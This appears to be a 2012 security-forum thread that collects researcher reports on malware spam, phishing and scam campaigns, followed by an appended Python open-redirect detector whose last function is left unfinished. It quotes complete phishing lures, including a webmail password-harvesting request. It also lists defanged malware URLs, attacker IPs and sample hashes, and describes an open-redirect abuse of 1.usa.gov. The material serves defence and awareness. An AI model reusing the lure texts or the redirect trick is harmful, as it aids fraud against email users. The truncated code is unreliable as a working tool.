Oct 15, 2012 - "... Right after reports of malicious Bad Piggies on Google Chrome webstore circulated, we found that certain developers also released their own, albeit rogue versions of the said gaming app. On the heels of Bad Piggies' launch last month, we saw rogue versions of the game on specific web pages hosted on Russian domains. However, these versions are -not- affiliated at all with the game. Based on our analysis, these apps are verified as malicious, specifically premium service abusers, which send SMS messages without user consent and leaves users with unnecessary charges... During our research, we used the keyword “Bad Piggies” and encountered 48 Russian domains. Among these sites is piggies-{BLOCKED}d .ru, which appears as an app download page.
> http://blog.trendmicro.com/trendlabs...es_website.jpg
... site offers the said app on different platforms. Instead of the actual Bad Piggies app, users instead download a malicious .APK file detected as ANDROIDOS_FAKEINST.A. Once installed, it creates a shortcut on the device’s homepage and sends SMS messages to specific numbers. As mentioned, these messages are sent without user consent and may cost users to pay extra for something they didn’t authorize... ANDROIDOS_FAKEINST.A has the ability to obfuscate its codes via inserting junk codes and encrypting the strings and decrypting it upon execution. It also replaces all class/method/field name with meaningless strings thus making analysis difficult... Bad Piggies is a spinoff of the highly popular Angry Bird franchise and its release enjoyed good coverage from popular media. Such is also the case with the malicious Instagram and Angry Birds Space... To victimize as many users as possible, shady developers and certain crooks created rogue versions to take advantage of these apps’ popularity and their media exposure. Russian domains also appear to be the favorite among rogue apps developers. Beginning this year up to July, we already blocked more than 6,000 mobile app pages hosted on .RU domains... an increase compared to last year’s 2,946 blocked sites. To lead users to these sites, the people behind these apps spread the links via forum, blog posts or email. To prevent downloading a fake (or worse, a malware disguised as an app) users should stick to legitimate app stores like Google Play..."
___
eBay phishers update branding...
- http://www.gfi.com/blog/ebay-phisher...heir-branding/
Oct 15, 2012 - "... be aware that not only have eBay updated their logo for the first time since 1995, some scammers have also been quick out of the blocks to rejig their phishing scams and paste in the new logo accordingly. Here’s a scammer who hasn’t quite grasped the concept of “You’re horribly outdated” yet:
> http://www.gfi.com/blog/wp-content/u...kebay_new2.jpg
... here’s a scammer who clearly keeps up with the news and probably owns a gold plated yacht and maybe a Unicorn as a result:
> http://www.gfi.com/blog/wp-content/u...kebay_new1.jpg
... It probably won’t be long before most (if not all) phishers start using the new logo, but for the time being at least some phish attempts will be a little easier to spot for the average end-user. Of course, avid eBay users can also visit their Security Center* and keep up to date with all the latest shenanigans."
* http://pages.ebay.com/securitycenter/index.html
:fear::fear: :mad:
-
SPAM, SPAM, and more SPAM ...
FYI...
Wire Transfer SPAM / hotsecrete .net
- http://blog.dynamoo.com/2012/10/wire...ecretenet.html
16 Oct 2012 - "This fake wire transfer spam leads to malware on hotsecrete .net:
From: Federal Information System [mailto:highjackingucaf10@atainvest.com]
Sent: 16 October 2012 15:59
Subject: Wire Transfer accepted
We have successfully done the following transfer:
________________________________________
Item #: 35043728
Amount: $16,861.99
To: Anthony Glover
Fee: 29.00
Send on Date: 10/16/2012
Service: Domestic Wire
________________________________________
If there is a problem with processing your request we would report to you both by email and on the Manage Accounts tab. You can always check your transfer status via this link Sincerely,
Federal Reserve Bank Automate Notify System
*********************************************
Email Preferences
This is a service warning from Federal Reserve Bank. Please note that you may receive notification note in accordance with your service agreements, whether or not you elect to receive promotional email.
=============================================
Federal Reserve Bank Email, 8th Floor, 170 Seashore Tryon, Ave., Charlotte, TX 89936-0001 Federal Reserve Bank.
The malicious payload is found at [donotclick]hotsecrete .net/detects/exclude-offices_details_warm.php hosted on 183.81.133.121 (Vodafone, Fiji) which is a well-known malicious IP address that you should block."
___
LinkedIn SPAM / 74.91.112.86
- http://blog.dynamoo.com/2012/10/link...749111286.html
16 Oct 2012 - "This fake LinkedIn spam leads to malware on 74.91.112.86:
From: LinkedIn.Invitations [mailto:1F31A2F6B@delraybeachhomesales.com]
Sent: 16 October 2012 13:50
To: [redacted]
Subject: New invitation is waiting for your response
Hi [redacted],
David sent you an invitation to connect 13 days ago. How would you like to respond?
Accept Ignore Privately
Hilton Suarez
Precision Castparts (Distributor Sales Manager EMEA)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]74.91.112.86 /links/assure_numb_engineers.php hosted by Nuclearfallout Enterprises in the US (no surprises there)."
___
Facebook SPAM / o.anygutterkings .com
- http://blog.dynamoo.com/2012/10/face...rkingscom.html
15 Oct 2012 - "This fake Facebook spam leads to malware on o.anygutterkings .com:
Date: Mon, 15 Oct 2012 20:02:21 +0200
From: "FB Account"
Subject: Facebook account
facebook
Hi [redacted],
You have blocked your Facebook account. You can reactivate your account whenever you wish by logging into Facebook with your former login email address and password. Subsequently you will be able to take advantage of the site as before
Kind regards,
The Facebook Team
Sign in to Facebook and start connecting ...
Please use the link below to resume your account ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
Other subjects are: "Account blocked" and "Account activated"
The payload is at [donotclick]o.anygutterkings .com/links/assure_numb_engineers.php hosted on 198.136.53.38 (Comforthost, US)..."
- http://www.gfi.com/blog/this-spam-gi...second-chance/
Oct 16, 2012 - "... another Blackhole-Zeus-related threat... ignore and delete this Facebook spam..."
> http://www.gfi.com/blog/wp-content/u...10/FB_1015.png
___
Intuit SPAM / navisiteseparation .net
- http://blog.dynamoo.com/2012/10/intu...rationnet.html
15 Oct 2012 - "This fake Intuit spam leads to malware on navisiteseparation .net:
Date: Mon, 15 Oct 2012 15:20:13 -0300
From: "Intuit GoPayment" [crouppywo4@deltamar.net]
Subject: Welcome - you're accepted for Intuit GoPayment
Congratulations!
GoPayment Merchant by Intuit request for ONTIMEE ADMINISTRATION, Inc. has been ratified.
GoPayment
Account Number: XXXXXXXXXXXXXX55
Email Address: [redacted]
PLEASE NOTE : Associated charges for this service may be applied now.
Next step: View or confirm your Access ID
This is {LET:User ID lets you:
Review your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is we found an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify Access ID
Get started:
Step 1: If you have not still, download the Intuit software.
Step 2: Launch the Intuit application and sign in with the Access ID (your email address) and Password you setup.
Easy Manage Your Intuit GoPayment Account
The GoPayment Merchant Service by Intuit Center is the web site where you can learn more about GoPayment features, customize your sales receipt and add GoPayment users. You can also view transactions, deposits and fees. Visit url and sign in with your GoPayment AccesID (your email address) and Password.
For more information on how to start using GoPayment Merchant by Intuit, including tutorials, FAQs and other resources, visit the Merchant Service Center at service link.
Please don't reply to this message. auto informer system unable to accept incoming messages.
System Terms & Agreements © 2008-2012 Intuit, INC. All rights reserved.
... Sample subjects:
Congrats - you're accepted for Intuit GoPayment Merchant
Congratulations - you're approved for Intuit Merchant
Congrats - you're approved for GoPayment Merchant
Welcome - you're accepted for Intuit GoPayment
The malicious payload is at [donotclick]navisiteseparation .net/detects/processing-details_requested.php hosted on 183.81.133.121 (Vodafone, Fiji). The good news is that the domain has been suspended by the registrar, but that IP address has been used many times recently and should be blocked if you can."
___
Copies of Policies SPAM / linkrdin .ru
- http://blog.dynamoo.com/2012/10/copi...inkrdinru.html
15 Oct 2012 - "Another "Copies of Policies" spam, this time leading to malware on linkrdin .ru:
From: [support@victimdomain.com]
Date: 15 October 2012 07:15
Subject: RE: SANTOS - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
The malicious payload is on [donotclick]linkrdin .ru:8080/forum/links/column.php ... hosted on the same IPs as this spam:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (UAB Interneto Vizija, Lithuania)
203.80.16.81 (MYREN, Malaysia) ..."
:mad::mad: :fear:
-
Fake AA, Amazon emails serve BlackHole Exploit kit
FYI...
Fake American Airlines emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/17/a...e-exploit-kit/
Oct 17, 2012 - "... cybercriminals launched yet another massive spam campaign, this time impersonating American Airlines in an attempt to trick its customers into clicking on a malicious link found in the mail. Upon clicking on the link, users are exposed to the client-side exploits served by the BlackHole Exploit Kit v2.0...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
Spamvertised compromised URL: hxxp ://malorita-hotel .by/wp-config.htm
Detection rate for a sample Java script redirection: American_Airlines.html – MD5: 7b23a4c26b031bef76acff28163a39c5* ...JS/Exploit-Blacole.gc; JS:Blacole-CF [Expl]
Sample client-side exploits serving URL: hxxp ://omahabeachs .ru:8080/forum/links/column.php
We’ve already seen the same malicious email used in the previously profiled “Cybercriminals impersonate -UPS-, serve client-side exploits and malware” campaign, clearly indicating that these campaigns are launched by the same cybercriminal/gang of cybercriminals..."
* https://www.virustotal.com/file/68d4...is/1349016199/
File name: American_Airlines.html
Detection ratio: 9/42
Analysis date: 2012-09-30
___
Fake Amazon emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/16/c...s-and-malware/
Oct 16, 2012 - "... cybercriminals have been spamvertising millions of emails impersonating Amazon.com in an attempt to trick customers into thinking that they’ve received a Shipping Confirmation for a Vizio XVT3D04, HD 40-Inch 720p 100 Hz Cinema 3D LED-LCD HDTV FullHD and Four Pairs of 3D Glasses. Once users click on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the latest version of the Black Hole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... Second screenshot of the spamvertised email impersonating Amazon.com Inc:
> https://webrootblog.files.wordpress....oit_kit_01.png
Once users click on the links found in the malicious email, they’re presented with the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress....oit_kit_02.png
Sample subjects used in the spamvertised emails:
Re: HD TV Waiting on delivery Few hours ago;
Your HDTV Delivered Now;
Re: HDTV Processed Yesterday;
Re: Order Processed Today;
Your Order Approved Few hours ago ...
Sample detection rate for the malicious Java script: – Amazon.html – MD5: a8af3b2fba56a23461f2cc97a7b97830* ... JS/Obfuscus.AACB!tr; Trojan-Downloader.JS.Expack.ael
Once a successful client-side exploitation takes place, the BlackHole Exploit kit drops a malicious PDF file with MD5: 9a22573eb991a3780791a2df9c55ddab* that’s exploiting the CVE-2010-0188 vulnerability."
* https://www.virustotal.com/file/4747...is/1349014600/
File name: Amazon.html
Detection ratio: 20/43
Analysis date: 2012-09-30
___
Spoofed WebEx, PayPal Emails lead to Rogue Flash Update
- http://blog.trendmicro.com/trendlabs...-flash-update/
Oct 16, 2012 - "... Last week, we received two spoofed emails that redirect users to a fake Adobe Flash Player update. These messages use different approaches to lure users into downloading the malicious file update_flash_player.exe (detected as TSPY_FAREIT.SMC).
The first email is disguised as a WebEx email containing an HTM attachment. Once users execute this attachment, they are led to a malicious site hosting TSPY_FAREIT.SMC. Employees may be tricked into opening this as it appears to be an alert coming from a business tool they often use...
> http://blog.trendmicro.com/trendlabs...ebex_email.jpg
The second sample, on the other hand, is a spoofed PayPal email that features transaction details.
> http://blog.trendmicro.com/trendlabs...shingemail.jpg
Curious users who click these details are then directed to the webpage hosting the rogue Flash update file... Once executed, TSPY_FAREIT.SMC drops a variant of the infamous banking malware ZeuS/ZBOT, specifically TSPY_ZBOT.AMM and TSPY_ZBOT.LAG. If you may recall, this malware family is known for its information theft routines. These variants are specifically crafted to steal online banking credentials such as usernames, passwords, and other important account details. This stolen information is then used to initiate transactions without users' knowledge or is peddled in the underground market for the right price... The use of WebEx in these spoofed emails is also fishy (phishy?). WebEx is a popular business conference/meeting technology in the corporate world... We believe that the perpetrators of this threat are likely targeting businesses and employees...
Update... We observed a blackhole exploit kit (BHEK) spam run mimicking Facebook notification that leads to the site hosting another rogue Flash Player update (detected as TSPY_FAREIT.AMM) that drops ZeuS/ZBOT variants... expect that such spam runs won’t be fading soon... these attacks are continuing at full speed... users are advised to be continuously extra careful with clicking links on email messages."
:mad::mad:
-
Fake Traffic Ticket SPAM - and more...
FYI...
NY Traffic Ticket SPAM / kennedyana .ru
- http://blog.dynamoo.com/2012/10/ny-t...nedyanaru.html
18 Oct 2012 - "This fake Traffic Ticket spam leads to malware on kennedyana .ru:
Date: Wed, 17 Oct 2012 03:59:44 +0600
From: sales1@[redacted]
To: [redacted]
Subject: Fwd: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 5:16 AM
Date of Offense: 21/01/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload is on [donotclick]kennedyana .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia) ..."
___
Fake Intuit 'Payroll Confirmation inquiry’ emails lead to the BlackHole exploit kit
- http://blog.webroot.com/2012/10/18/i...e-exploit-kit/
Oct 18, 2012 - "...two consecutive massive email campaigns, impersonating Intuit Payroll’s Direct Deposit Service system, in an attempt to trick end and corporate users into clicking on the malicious links found in the mails. Upon clicking on -any- of links found in the emails, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the first spamvertised campaign:
> https://webrootblog.files.wordpress....xploit_kit.png
Upon clicking on the links found in the malicious emails, users are exposed to the following bogus “Page loading…” screen:
> https://webrootblog.files.wordpress....oit_kit_01.png
Screenshots of the second spamvertised campaign:
> https://webrootblog.files.wordpress....oit_kit_02.png
... Both of these malicious domains used to respond to 183.81.133.121; 195.198.124.60; 203.91.113.6. More malicious domains part of the campaign’s infrastructure are known to have responded to the same IPs... Detection rate, MD5: 5723f92abf257101be20100e5de1cf6f * ... Gen:Variant.Kazy.96378; Worm.Win32.Cridex.js, MD5: 06c6544f554ea892e86b6c2cb6a1700c ** ... Trojan.Win32.Buzus.mecu; Worm:Win32/Cridex.B..."
* https://www.virustotal.com/file/64e1...4bb3/analysis/
File name: contacts.exe
Detection ratio: 17/43
Analysis date: 2012-09-29
** https://www.virustotal.com/file/ee30...d907/analysis/
File name: virussign.com_06c6544f554ea892e86b6c2cb6a1700c.exe
Detection ratio: 33/43
Analysis date: 2012-10-19
___
Adbobe CS4 SPAM / leprasmotra .ru
- http://blog.dynamoo.com/2012/10/adbo...asmotraru.html
18 Oct 2012 - "This fake Adobe spam leads to malware on leprasmotra.ru:
Date: Thu, 18 Oct 2012 10:00:26 -0300
From: "service@paypal.com" [service@paypal.com]
Subject: Order N04833
Good morning,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]leprasmotra .ru:8080/forum/links/column.php hosted on:
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Blocking access to those IPs is recommended."
___
LinkedIn SPAM / 64.111.24.162
- http://blog.dynamoo.com/2012/10/link...411124162.html
17 Oct 2012 - "This fake LinkedIn spam leads to malware on 64.111.24.162:
From: LinkedIn.Invitations [mailto:8B44145D0@bhuna.net]
Sent: 17 October 2012 10:06
Subject: New invitation is waiting for your response
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Alexis Padilla
C.H. Robinson Worldwide (Sales Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]64.111.24.162 /links/assure_numb_engineers.php allocated to Data 102 in the US and then suballocated to:
network:Network-Name:Buzy Bee Hosting /27
network:IP-Network:64.111.24.160/27
network:IP-Network-Block:64.111.24.160 - 64.111.24.191
network:Org-Name:Buzy Bee Hosting
network:Street-Address:1451 North Challenger Dr
network:City:Pueblo West
network:State:CO
network:Postal-Code:81007
network:Country-Code:US
... Blocking the IP (and possibly the /27 block) is probably wise.
___
Amazon.com SPAM / sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info
- http://blog.dynamoo.com/2012/10/amaz...iddnsinfo.html
17 Oct 2012 - "This fake Amazon.com spam leads to malware on sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info:
From: Amazon.Com [mailto:pothooknw@tcsn.net]
Sent: 17 October 2012 06:54
Subject: Your Amazon.com order of "Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch" has shipped!
Importance: High
Gift Cards
| Your Orders
| Amazon.com
Shipping Confirmation
Order #272-3140048-4213404
Hello,
Thank you for shopping with us. We thought you'd like to know that we shipped your gift, and that this completes your order. Your order is on its way, and can no longer be changed. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Your estimated delivery date is:
Tuesday, October 9, 2012
Your package is being shipped by UPS and the tracking number is 1ZX305712324670208. Depending on the ship speed you chose, it may take 24 hours for your tracking number to return any information.
Shipment Details
Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch
Sold by Amazon.com LLC (Amazon.com) $109.95
Item Subtotal: $109.95
Shipping & Handling: $0.00
Total Before Tax: $109.95
Shipment Total: $109.95
Paid by Visa: $109.95
Returns are easy. Visit our Online Return Center.
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message.
The malicious payload is at [donotclick]sdqhfckuri .ddns.info/links/calls_already_stopping.php or [donotclick]ultjiyzqsh .ddns.info/links/calls_already_stopping.php hosted on 37.230.117.4 (The First CJSC, Russia).
Added: snfgrhoykdcb.ddns.info and jdrxnlbyweco.ddns.info are also being used in this attack, although they do not resolve at present.
Blocking .ddns.info and .ddns.name domains will probably not spoil your day. Blocking the 37.230.116.0/23 range might not either..."
___
Take a critical look at DNS blocking...
- http://h-online.com/-1731993
18 Oct 2012
:mad::mad:
-
Fake Facebook direct messages - malware campaign
FYI...
Fake Facebook direct messages - malware campaign ...
- http://blog.webroot.com/2012/10/19/m...d-in-the-wild/
Oct 19, 2012 - "... one of my Facebook friends sent me a direct message indicating that his host has been compromised, and is currently being used to send links to a malicious .zip archive through direct messages to all of his Facebook friends...
Sample screenshot of the spamvertised direct download link:
> https://webrootblog.files.wordpress....e_campaign.png
... All of these redirect to hxxp://74.208.231.61 :81/l.php – tomascloud .com – AS8560... user is exposed to a direct download link of Picture15 .JPG .zip.
Detection rate: MD5: dfe23ad3d50c1cf45ff222842c7551ae * ... Trojan.Win32.Bublik.iez; Worm:Win32/Slenfbot..."
* https://www.virustotal.com/file/a6ab...is/1349355521/
File name: Picture15-JPG.scr
Detection ratio: 20/43
Analysis date: 2012-10-04 ..."
___
LinkedIn SPAM / cowonhorse .co
- http://blog.dynamoo.com/2012/10/link...onhorseco.html
19 Oct 2012 - "This fake LinkedIn spam leads to malware on cowonhorse .co:
From: LinkedIn.Invitations [mailto:4843D050@pes.sau48.org]
Sent: Fri 19/10/2012 10:29
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Estelle Garrison
Interpublic Group (Executive Director Marketing PPS)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:43DD0F0@cankopy.com]
Sent: Fri 19/10/2012 11:39
Subject: New invitation
Hi [redacted],
User sent you an invitation to connect 14 days ago. How would you like to respond?
Accept Ignore Privately
Carol Parks
Automatic Data Processing (Divisional Finance Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:3A1665D92@leosanches.com]
Sent: Fri 19/10/2012 12:28
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Rupert Nielsen
O'Reilly Automotive (Head of Non-Processing Infrastructure)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]cowonhorse .co/links/observe_resources-film.php hosted on 74.91.118.239 (Nuclearfallout Enterprises, US). Nuclearfallout have hosted sites like this several times before..."
___
Fake Friendster emails lead to BlackHole exploit kit
- http://blog.webroot.com/2012/10/19/r...e-exploit-kit/
19 Oct 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Friendster, in an attempt to trick its current and prospective users into clicking on a malicious link found in the email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress....xploit_kit.png
... sonatanamore .ru used to respond to the following IPs – 70.38.31.71; 202.3.245.13; 203.80.16.81; 213.251.162.65 ... Sample detection rate for the malicious iFrame loading script: friedster.html – MD5: c444036179aa371aebf9bae3e7cc5eef * ... Exploit.JS.Blacole; Trojan.JS.Iframe.acn
Upon successful client-side exploitation, the campaign drops MD5: 8fa93035ba01238dd7a55c378d1c2e40** on the affected host... Trojan-Ransom.Win32.PornoAsset.aeuz; Worm:Win32/Cridex.E
Upon execution, the sample phones back to 95.142.167.193 :8080/mx/5/A/in..."
* https://www.virustotal.com/file/2d91...is/1349356588/
File name: Friendster.html
Detection ratio: 12/43
Analysis date: 2012-10-04
** https://www.virustotal.com/file/94ff...690d/analysis/
File name: 8fa93035ba01238dd7a55c378d1
Detection ratio: 27/43
Analysis date: 2012-10-05
___
Cisco - Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake UPS Payment Document Attachment E-mail Messages - October 19, 2012
Fake Shipment Notification E-mail Messages - October 19, 2012
Fake Product Quote Request E-mail Messages - October 19, 2012
Fake Changelog E-mail Messages - October 19, 2012
Fake Xerox Scan Attachment E-mail Messages - October 19, 2012
Fake Bill Statement E-mail Messages - October 19, 2012
Fake Bank Transfer Receipt E-mail Messages - October 19, 2012
Fake Payment Slip E-mail Messages - October 19, 2012
Fake Money Transfer Receipt E-mail Messages - October 19, 2012
Fake Purchase Order Confirmation E-mail Messages - October 19, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 19, 2012
Fake Portuguese Health Alert Notification E-mail Messages - October 19, 2012
Fake Payment Slip Confirmation E-mail Message - October 19, 2012 ...
:mad:
-
SCAM-SPAM-and PHISH ...
FYI... multiple entries - SCAM-SPAM-and PHISH:
SCAM - worthless domain names: tsnetint .com and tsnetint .org
- http://blog.dynamoo.com/2012/10/scam...netintorg.html
22 Oct 2012 - "Another episode in a long-running domain scam, which attempts to get you to buy worthless domain names by scaremongering. In this case the fake company is called "Kenal investment Co. Ltd" (there are several legitimate firms with a similar name). If you get one of these, ignore it and don't give the scammers any money.
The domains quoted are tsnetint .com and tsnetint .org and the originating IP is 117.27.141.168, all hosted in deepest China.
From: bertram @tsnetint .com
Date: 22 October 2012 06:02
Subject: Confirmation of Registration
(Letter to the President or Brand Owner, thanks)
Dear President,
We are the department of Asian Domain Registration Service in China. Here I have something to confirm with you. We formally received an application on October 19, 2012 that a company claimed Kenal investment Co. Ltd were applying to register "dynamoo" as their Net Brand and some domain names through our firm.
Now we are handling this registration, and after our initial checking, we found the name were similar to your company's, so we need to check with you whether your company has authorized that company to register these names. If you authorized this, we would finish the registration at once. If you did not authorize, please let us know within 7 workdays, so that we could handle this issue better. After the deadline we will unconditionally finish the registration for Kenal investment Co. Ltd. Looking forward to your prompt reply.
Best Regards,
Bertram Hong
Registration Dept.
Office:Tel: 86 2885915586 || Fax: +86 2885912116
Address:9/F Libao building No,62 Kehua North Road,Wuhou District,Chengdu City,China ..."
___
SPAM with .gov URLs
- http://www.symantec.com/connect/blogs/spam-gov-urls
22 Oct 2012 Updated - "Symantec is observing an increase in spam messages containing .gov URLs. A screenshot of a sample message is below:
> https://www.symantec.com/connect/sit...govURL%201.png
Traditionally, .gov URLs have been restricted to government entities. This brings up the question of how spammers are using .gov URLs in spam messages.
The answer is on this webpage:
1.USA.gov is the result of a collaboration between USA.gov and bitly.com, the popular URL shortening service. Now, whenever anyone uses bitly to shorten a URL that ends in .gov or .mil, they will receive a short, trustworthy 1.usa.gov URL in return.
... While this feature has legitimate uses for government agencies and employees, it has also opened a door for spammers. By using an open-redirect vulnerability, spammers were able to set up a 1.usa.gov URL that leads to a spam website.
Using the above example:
[http ://]1.usa .gov/[REMOVED]/Rxpfn9
leads to
[http ://]labor.vermont .gov/LinkClick.aspx?link=http://workforprofit.net/[REMOVED]/?wwvxo
which leads to
[http ://]workforprofit .net/[REMOVED]/?wwvxo
The final spam page is a work-at-home scam website that has been designed to look like a financial news network website:
> https://www.symantec.com/connect/sit...govURL%202.png
To add legitimacy to the website, spammers have designed it so that other links, such as the menu bar at the top and other news articles (not shown in the above picture), actually lead to the financial news website that it is spoofing. However, the links in the article all lead to a different website where the spammer tries to make the sale:
> https://www.symantec.com/connect/sit...0thumbnail.png
USA.gov provides data created any time anyone clicks on a 1.usa.gov URL (link available on this webpage). Analysis of data from the last seven days shows that this trend began on October 12. As of October 18, 43,049 clicks were made through 1.usa.gov shortened URLs to these spam domains:
consumeroption .net
consumerbiz .net
workforprofit .net
consumeroptions .net
consumerlifenet .net
consumerbailout .net
consumerlifetoday .net
consumerneeds .net
consumerstoday .net
consumerlivestoday .net
> https://www.symantec.com/connect/sit...govURL%204.png
... This chart shows the number of spam clicks made on a daily basis:
> https://www.symantec.com/connect/sit...govURL%205.png
While taking advantage of URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can utilize a .gov service to make their own links is worrisome. Symantec encourages users to always follow best practices and exercise caution when opening links even if it is a .gov URL."
___
Phish for regular Webmail Accounts
- https://isc.sans.edu/diary.html?storyid=14356
Last Updated: 2012-10-22 - "I was looking through my spam folder today and saw an interesting phish. The phishing email is looking for email account information. Nothing new about that, except this one seemed to have a broad target range. Normally, these types of phishes are sent to .edu addresses not those outside of academia. From the email headers, this one was sent to the Handlers email which is a .org. A non-technical user, like many of my relatives, would probably respond to this. I could see this being successful against regular webmail users of Gmail, Hotmail, etc. especially if the verbiage was changed slightly. It could also be targeting those who may be enrolled in online universities... I have included the email below:
From: University Webmaster <university.m @usa .com>
Date: Fri, Oct 19, 2012 at 9:34 PM
Subject: Webmail Account Owner
To:
Dear Webmail Account Owner,
This message is from the University Webmail Messaging Center to all email account owners.
We are currently carrying out scheduled maintenance,upgrade of our web mail service and we are changing our mail host server,as a result your original password will be reset.
We are sorry for any inconvenience caused.
To complete your webmail email account upgrade, you must reply to this email immediately and provide the information requested below.
---
CONFIRM YOUR EMAIL IDENTITY NOW
E-mail Address:
User Name/ID:
Password:
Re-type Password:
---
Failure to do this will immediately render your email address deactivated from the University Webmail..."
___
"Copies of Policies" SPAM / fidelocastroo .ru
- http://blog.dynamoo.com/2012/10/copi...castrooru.html
22 Oct 2012 - "This spam leads to malware on fidelocastroo .ru:
Date: Mon, 22 Oct 2012 08:05:10 -0500
From: Twitter [c-FG6SPPPCGK63=D8154Z4.8N4-6042f@postmaster.twitter.com]
Subject: RE: Charley - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Charley HEALY,
The malicious payload is on [donotclick]fidelocastroo .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (Interneto Vizija, Lithuania)
190.10.14.196 (RACSA, Costa Rica)
202.3.245.13 (MANA, French Polynesia)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Plain list for copy and pasting:
68.67.42.41
79.98.27.9
190.10.14.196
202.3.245.13
203.80.16.81
209.51.221.247
Blocking these IPs should prevent any other attacks on the same server."
:mad:
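The 1.usa.gov -> LinkClick.aspx -> workforprofit.net chain from the Symantec post above, as an added example (not Symantec's or USA.gov's code) of how a mail filter could flag that open-redirect pattern offline. It follows a constructed redirect table standing in for live HTTP lookups; the REDIRECT_PARAMS set, the two-label domain check and the "REMOVED" path segments are assumptions.

```python
"""Added example: detect the open-redirect chain behind a 1.usa.gov link.
Offline: redirects come from a constructed table, not from the network."""
from urllib.parse import urlparse, parse_qsl, unquote

# Query parameter names that commonly carry a redirect target (assumption).
REDIRECT_PARAMS = {"link", "url", "redirect", "redir", "goto", "next", "return", "target"}


def registrable_domain(host: str) -> str:
    """Crude eTLD+1: the last two labels. Assumption: no public-suffix list offline."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def external_redirect_param(url: str):
    """Return (param, target) when the query string carries an absolute URL whose
    registrable domain differs from the page's own, i.e. the LinkClick.aspx?link=
    pattern the post describes. Otherwise return None."""
    parsed = urlparse(url)
    if not parsed.hostname:
        return None
    own = registrable_domain(parsed.hostname)
    for name, value in parse_qsl(parsed.query, keep_blank_values=True):
        candidate = unquote(value)
        target = urlparse(candidate)
        if target.scheme in ("http", "https") and target.hostname \
                and registrable_domain(target.hostname) != own:
            return name, candidate
    return None


def resolve_chain(url: str, lookup, max_hops: int = 10):
    """Follow redirects via lookup(url) -> next URL or None (stand-in for an
    HTTP HEAD without auto-redirect). Stops on a landing page, a loop or max_hops."""
    chain = [url]
    seen = {url}
    while len(chain) <= max_hops:
        nxt = lookup(chain[-1])
        if nxt is None or nxt in seen:
            break
        chain.append(nxt)
        seen.add(nxt)
    return chain


def assess(url: str, lookup):
    """Summarise a URL for a mail filter: hop count, final landing domain, every
    hop that abuses a redirect parameter, and whether a .gov/.mil entry point
    ends up outside government space."""
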